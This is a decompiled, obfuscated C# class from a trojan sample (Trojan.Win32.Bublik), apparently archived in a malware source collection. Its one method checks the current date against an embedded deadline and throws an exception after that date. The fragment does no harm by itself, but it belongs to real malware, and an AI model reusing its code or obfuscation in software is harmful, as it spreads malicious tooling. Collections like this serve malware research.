MalwareSourceCode/MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4/cb172a3cf4de66a26f276fa336a900f40.cs
2022-08-18 06:28:56 -05:00

35 lines
1.4 KiB
C#

// Decompiled with JetBrains decompiler
// Type: A.cb172a3cf4de66a26f276fa336a900f40
// Assembly: Club, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A9E8E336-37BF-4AEB-A0AA-C09A4AE1EC93
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4.exe
using System;
using System.Reflection;
namespace A
{
internal class cb172a3cf4de66a26f276fa336a900f40
{
internal static void c8a7fc1893bd951199feb87a0595012ad()
{
DateTime dateTime = new DateTime(long.Parse(c0101fd8803cfd89ecc47c2ee5ea3536d.c63a0ab0f5643f828f13c6bbd6a2b539a(231)));
if (!(DateTime.Now > dateTime))
return;
label_1:
switch (6)
{
case 0:
goto label_1;
default:
if (false)
{
// ISSUE: method reference
RuntimeMethodHandle runtimeMethodHandle = __methodref (cb172a3cf4de66a26f276fa336a900f40.c8a7fc1893bd951199feb87a0595012ad);
}
throw new Exception(c0101fd8803cfd89ecc47c2ee5ea3536d.c63a0ab0f5643f828f13c6bbd6a2b539a(268) + Assembly.GetExecutingAssembly().GetName().Name + c0101fd8803cfd89ecc47c2ee5ea3536d.c63a0ab0f5643f828f13c6bbd6a2b539a(299) + dateTime.ToString(c0101fd8803cfd89ecc47c2ee5ea3536d.c63a0ab0f5643f828f13c6bbd6a2b539a(471)) + c0101fd8803cfd89ecc47c2ee5ea3536d.c63a0ab0f5643f828f13c6bbd6a2b539a(494));
}
}
}
}